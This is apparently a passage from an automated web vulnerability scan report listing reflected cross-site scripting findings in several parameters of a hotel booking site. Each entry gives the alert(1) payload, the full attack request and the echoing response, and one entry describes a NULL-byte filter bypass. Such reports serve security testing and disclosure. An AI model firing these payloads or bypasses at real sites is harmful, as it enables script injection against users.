Set-Cookie: Phoenix_state=GAK3abt5fxlj70znEfq5GTCc6PV-UGiP12spsXooN74I8clA%0A4Sf7SKVLQtriQMyL2JHgiCGNWyebA5gYgnCOG0mQmJbnjhl9%0AOB2klmIQyFcl7hngDlMzcIQ-75OaMITZWJdhVPTCCZUu5qhE%0AVzQAcuvFtoa74vufDW4G9mbO5DPlRgdDBRXSVGjKshTQjhQb%0AsBmBsBdV-zz26e4x_UsTseqZabIDFaGktjvSXL666aKlMZ26%0Ay0vxzivlo7FlQkoUCbkbcGKDtEdRnHuF-B4r4HK8nLIQgELq%0Av14iZCrI3L30ztnG-Rzn0vN7T9yNvs9Kjnbll-lBp_EQHEZ3%0AoonnfBZIVl-kRwSpcQRiMrSb_Ou2mGi7rgviZaDzrWkA4voy%0AJD2OWLMeOdU7O4DdLwuLQA; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
Set-Cookie: common=vdkfM5y5_XHKpGcJQefvwA; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1b9b87f679505aec410dfff13; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:29 GMT
Content-Length: 133534
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
<a style="color:#FFFFCC;" href=?Phoenix_state=clear&pagedst=RR1&hotelCode=CRPTWR&account_code=44821><SCRIPT>ALERT(1)</SCRIPT>9E90653BCE6&invBlockCode=&rpc_ASC=&rpc_SNR=&rpc_GOV=>
...[SNIP]...

2.101. https://ssl.omnihotels.com/Omni [hotelCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the hotelCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7bda"-alert(1)-"f6833bcb8e1 was submitted in the hotelCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /Omni HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Content-Length: 3243
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4rHzrdN9ZsPm22xG
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni?Perseus_state=clear&lang_code=en-us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Phoenix_state_public=EndDate%3A10%2F01%2F2011%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state=2bly9xnsEezx36aIHWb3VC1sFqLp81j7748HHKnBfwuKNwk_%0Alajmq2IOFuSggpVaVHjLP1eQIdq8wpi2DGaFwg; common=RS9gKfbg0p9uC6vw2vDs5A; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

------WebKitFormBoundary4rHzrdN9ZsPm22xG
Content-Disposition: form-data; name="region_city"


------WebKitFormBoundary4rHzrdN9ZsPm22xG
Content-Disposition: form-data; name="hotelCode"

d7bda"-alert(1)-"f6833bcb8e1
------WebKitFormBoundary4rHzrdN9ZsPm22xG
Content-Disposition: form-data; name="StartDate"

09/30/2011
------WebKitFormBoundary4rHzrdN9ZsPm22xG
Content-Disposition: form-data; name="EndDate"

1
...[SNIP]...

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:23 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:17:23 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3A%0Dd7bda%22-alert%281%29-%22f6833bcb8e1%0A------WebKitFormBoundary4rHzrdN9ZsPm22xG%0D%0AContent-Disposition%3A%20form-data%3B%20name%3D%22StartDate%22%0D%0A%0D%0A09%2F30%2F2011%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0Db9b87f67d85dc42856ba2fe8%7Cchild3%3A%0Db9b87f67da0223455bcef721%7Cchild1%3A%0Db9b87f672b90aefebc9195d%7Cadult_qty%3A1%7Cchild4%3A%0Db9b87f675b0e90d0c791e315%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Set-Cookie: Phoenix_state=JA70QvGnfzNWAD0MlyTykMV3rZzUdReE4PbehBMvnQVvo9ed%0ANuBMo8-82Df0unK5OxOnxpztZ5HFAhOKMUgKH9P0rwNja_wN%0Ax7-ItTLgComyy2p3IzidsNZ4OI46JxqMpsZquz5Fvrtrhy37%0AnBsUDQm_wu_sa65-yErv11Bri6YWanq1vKL0TzLlajLNY7yp%0AYsyNB8UYEAtsTqNaJtQ2tOT-Xk7w7O_w_9K3qLK6SJaIzcNV%0At0BO6R3KBioIcbo5ziJ8t73xKqo9AFcrMSoCwYSoNy6xQKsE%0Aje-cOrczqlmXYA_LyrdNiNOqwaA7GtdaSjmEd9WTwokmgOEe%0A91UJ9vytouJ7JXm5YG_b6ae2YqFLZQolUuv3IvRdY_t2KBVc%0AqVjpH-1G8dHgft6B6dLg8ouWnYajUHn_; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Set-Cookie: common=RIwEUHG1NhUgNU1tx-Nr8A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:47:23 GMT
Content-Length: 55176
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
may give each page an identifying name, server, and channel on the next lines. */
s.pageName="RR"
s.server="l3phoenixprod1.omnihotels.com"
s.channel="Rates & Reservations - RR"
s.pageType=""
s.prop1="d7bda"-alert(1)-"f6833bcb8e1
------WebKitFormBoundary4rHzrdN9ZsPm22xG
Content-Disposition: form-data; name="StartDate"

09/30/2011"
s.prop2="1"
s.prop3="0"
s.prop4="1 Nights"
s.prop5=""
s.prop6="NonMember"
/* E-commerce Vari
...[SNIP]...

2.102. https://ssl.omnihotels.com/Omni [invBlockCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the invBlockCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5445d"-alert(1)-"98c8ee4044ff4af1f was submitted in the invBlockCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Omni?region_city=%0d&hotelCode=%0d&StartDate=09%2f30%2f2011&EndDate=10%2f01%2f2011&room_qty=1&room1_adult_qty=1&room1_child_qty=0&room1_child1=%0d&room1_child2=%0d&room1_child3=%0d&room1_child4=%0d&room2_adult_qty=1&room2_child_qty=0&room2_child1=%0d&room2_child2=%0d&room2_child3=%0d&room2_child4=%0d&room3_adult_qty=1&room3_child_qty=0&room3_child1=%0d&room3_child2=%0d&room3_child3=%0d&room3_child4=%0d&account_code=%0d&invBlockCode=%0d5445d%22-alert%281%29-%2298c8ee4044ff4af1f&special_rates=1&iata_num=%0d&pagedst=RR1_2&pagesrc=RR&room_number=1&rate_summary_type=package&splash=1 HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni?Perseus_state=clear&lang_code=en-us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Phoenix_state_public=EndDate%3A10%2F01%2F2011%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state=2bly9xnsEezx36aIHWb3VC1sFqLp81j7748HHKnBfwuKNwk_%0Alajmq2IOFuSggpVaVHjLP1eQIdq8wpi2DGaFwg; common=RS9gKfbg0p9uC6vw2vDs5A; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:24:21 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:24:21 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3Ab9b87f67a6d8b86f520e0dbd%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%7Cchild3%3A%0D%7Cadult_qty%3A1%7Cchild1%3A%0D%7Cchild4%3A%0D%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Set-Cookie: Phoenix_state=njmq4bTxBm7t8txjfjzHnJ2fTehADMftrzjqoZzV-M-LIRqh%0AaaBPEXGSW6_CfXdqnz46TLilkQIwpiUULk7wlA1MCoYtqyPA%0AI5iPhuWXCjE-MiaBV4Oo9mysMEiV89K-0ZrDcDNgd-QbpbbD%0AGW6Of8ewIxeUYYZSH4UwIptJBeO32jpSn1vKstTl6vj1d81i%0AfXezOY25vVm0TDfnt5JEx4HMdpQYUbCPLXEIRpwHzs4jntVB%0Ae6Znuz0TPQ67k6QILXh8MjBo14DxktP8m11WXl7vi-xWWOMQ%0AXY6PdBF-kEZaZaJ__L_dS94aJ0zhxbpW; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Set-Cookie: common=yn2i2sVTx9smy3o0rBCbjA; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3Ab9b87f675fe6579ea886b6c%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:54:21 GMT
Content-Length: 55033
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
nel on the next lines. */
s.pageName="RR"
s.server="l3phoenixprod1.omnihotels.com"
s.channel="Rates & Reservations - RR"
s.pageType=""
s.prop1=""
s.prop2="1"
s.prop3="0"
s.prop4="1 Nights"
s.prop5="5445d"-alert(1)-"98c8ee4044ff4af1f"
s.prop6="NonMember"
/* E-commerce Variables */
s.eVar1=""
s.eVar2="1"
s.eVar3="0"
s.eVar4="1 Nights"
s.eVar5="5445d"-alert(1)-"98c8ee4044ff4af1f"
s.eVar6=""
s.events=""
s.state=""
s.zip=""
s.purch
...[SNIP]...

2.103. https://ssl.omnihotels.com/Omni [invBlockCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the invBlockCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69750"%3balert(1)//ee84ec46703 was submitted in the invBlockCode parameter. This input was echoed as 69750";alert(1)//ee84ec46703 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Omni?region_city=CORPUS+CHRISTI&account_code=&iata_num=&invBlockCode=69750"%3balert(1)//ee84ec46703&room1_child2=&EndDate=10%2F01%2F2011&room3_child4=&room3_child_qty=0&room2_adult_qty=1&room3_child1=&room3_adult_qty=1&room3_child2=&room3_child3=&room2_child4=&room1_adult_qty=1&pagesrc=RR&room1_child3=&room2_child2=&room_number=1&StartDate=09%2F30%2F2011&room2_child_qty=0&rate_summary_type=package&room1_child1=&room2_child1=&pagedst=RR1_2&hotelCode=&room_qty=1&special_rates=1&room1_child_qty=0&splash=0&room1_child4=&room2_child3= HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; Phoenix_state=1mkhF0sCdFn2lRalDgvU22H5LAkbZtXWGORshrBGNFBsGF7Q%0ApH71_35RKY3JH4yi_nXgyreYesvZL1BhKEVNDCGJdY3sCf2I%0AYnJ518lstWvA1XBTMK4WfH3NSM5pv7D-9NChb5HRKja5KzIN%0AgmgWKIsqylamChUeMf7kW6iciVEbCKelt6RhzTjzyDGydPmJ%0AWNm1X7QkhTdiNenZVpvBrBTWc2FIQ7Pq; common=Y5JsAspErFJ6DDWEUyhCKg; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:10 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:18:11 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Set-Cookie: Phoenix_state=rSRvRw88Ya8FAhu_FEoOUUOhtm5oo6d0Sugxykyqa_rB9WWb%0AMyGboQ05TltYQOfYDli9M7Mr-kHcgStHLwn4NOBmkoJnY9qZ%0AcZvuCfJe-mBppN3OdXCssag3LZJS0SgnEubxCNYISmYYdc1Q%0ApE-hPsHUoTagPs8f9w-Rig5HQ-yK66XPFuEn2UsyF3AP0zkA%0AA9Wq74z-uwiRGAhyMy_-mLpoBLJhpaG4RnvPd2eqJQsFaa5G%0A_uQ2qQQcmjbUd93CDGZlMVq4Mk_lp3riAk9HXfBQ_wRpjZQs%0AlthHS7EyplPonVR0aJmRLm2tPzQhRG-B_DZXSG4Q9i-yNQYd%0AWzA2-UTBd-m64WT-dwUeWH4PY6y_2A6lSxNIEw; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Set-Cookie: common=8gs2L8xq5rjHhSj2I_mEtg; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:11 GMT
Content-Length: 55029
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
n the next lines. */
s.pageName="RR"
s.server="l3phoenixprod1.omnihotels.com"
s.channel="Rates & Reservations - RR"
s.pageType=""
s.prop1="CRPTWR"
s.prop2="1"
s.prop3="0"
s.prop4="1 Nights"
s.prop5="69750";alert(1)//ee84ec46703"
s.prop6="NonMember"
/* E-commerce Variables */
s.eVar1="CRPTWR"
s.eVar2="1"
s.eVar3="0"
s.eVar4="1 Nights"
s.eVar5="69750";alert(1)//ee84ec46703"
s.eVar6=""
s.events=""
s.state=""
s.zip=""
s.purcha
...[SNIP]...

2.104. https://ssl.omnihotels.com/Omni [room_number parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the room_number request parameter is copied into the HTML document as plain text between tags. The payload b05cb<script>alert(1)</script>71e62b26abb was submitted in the room_number parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Omni?region_city=CORPUS+CHRISTI&account_code=&iata_num=&invBlockCode=&room1_child2=&EndDate=10%2F01%2F2011&room3_child4=&room3_child_qty=0&room2_adult_qty=1&room3_child1=&room3_adult_qty=1&room3_child2=&room3_child3=&room2_child4=&room1_adult_qty=1&pagesrc=RR&room1_child3=&room2_child2=&room_number=1b05cb<script>alert(1)</script>71e62b26abb&StartDate=09%2F30%2F2011&room2_child_qty=0&rate_summary_type=package&room1_child1=&room2_child1=&pagedst=RR1_2&hotelCode=&room_qty=1&special_rates=1&room1_child_qty=0&splash=0&room1_child4=&room2_child3= HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; Phoenix_state=1mkhF0sCdFn2lRalDgvU22H5LAkbZtXWGORshrBGNFBsGF7Q%0ApH71_35RKY3JH4yi_nXgyreYesvZL1BhKEVNDCGJdY3sCf2I%0AYnJ518lstWvA1XBTMK4WfH3NSM5pv7D-9NChb5HRKja5KzIN%0AgmgWKIsqylamChUeMf7kW6iciVEbCKelt6RhzTjzyDGydPmJ%0AWNm1X7QkhTdiNenZVpvBrBTWc2FIQ7Pq; common=Y5JsAspErFJ6DDWEUyhCKg; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:21:19 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:21:20 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3Ab9b87f67a6d8b86f520e0dbd%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Set-Cookie: Phoenix_state_room1=child3%3A%22%7Cadult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Set-Cookie: Phoenix_state=ACISIBcarlQ2ABsGGMQNRNtUK6We_zyXLc3nFUfLmy4jG6RX%0Ayc8B3dKJ3EwUjmvPCchROpmUA3pCga5s0si6i7SABRIVa_MG%0AIuAnQhUnaJDSIdy0oEtqH8Po1Tgg8q60v7jdKiaz-Fn2aZ09%0A4SugV_SFOPz2cL1cK29mXH1EnkSpcZmIjmSqknwPv72oKUWQ%0AjuFB72dvp52znYjPEgGeSLTpWNTzgcHyswJ6BcH_Mljoge8b%0AA0oY-5LNSoGtF-VUva6bngIZTY4N4zRQ_PGpPYfWPbkToXIv%0AEsTNXh7ReD-CUtaf5_6GQPz11bcbnTpFPNxj8AVkqTCPogc5%0AJT071wLX8q-Hf-SeCTyt9XEIH-Y; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Set-Cookie: common=a9gLVn-TbiDWFD0e2CnWCg; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:20 GMT
Content-Length: 134471
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
<th class="roomColor">Room 1b05cb<script>alert(1)</script>71e62b26abb</th>
...[SNIP]...

2.105. https://ssl.omnihotels.com/Omni [room_qty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the room_qty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9eeec"-alert(1)-"262ff3a3a492bcefc was submitted in the room_qty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Omni?region_city=%0d&hotelCode=%0d&StartDate=09%2f30%2f2011&EndDate=10%2f01%2f2011&room_qty=19eeec%22-alert%281%29-%22262ff3a3a492bcefc&room1_adult_qty=1&room1_child_qty=0&room1_child1=%0d&room1_child2=%0d&room1_child3=%0d&room1_child4=%0d&room2_adult_qty=1&room2_child_qty=0&room2_child1=%0d&room2_child2=%0d&room2_child3=%0d&room2_child4=%0d&room3_adult_qty=1&room3_child_qty=0&room3_child1=%0d&room3_child2=%0d&room3_child3=%0d&room3_child4=%0d&account_code=%0d&invBlockCode=%0d&special_rates=1&iata_num=%0d&pagedst=RR1_2&pagesrc=RR&room_number=1&rate_summary_type=package&splash=1 HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni?Perseus_state=clear&lang_code=en-us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Phoenix_state_public=EndDate%3A10%2F01%2F2011%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state=2bly9xnsEezx36aIHWb3VC1sFqLp81j7748HHKnBfwuKNwk_%0Alajmq2IOFuSggpVaVHjLP1eQIdq8wpi2DGaFwg; common=RS9gKfbg0p9uC6vw2vDs5A; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:39 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:18:39 GMT
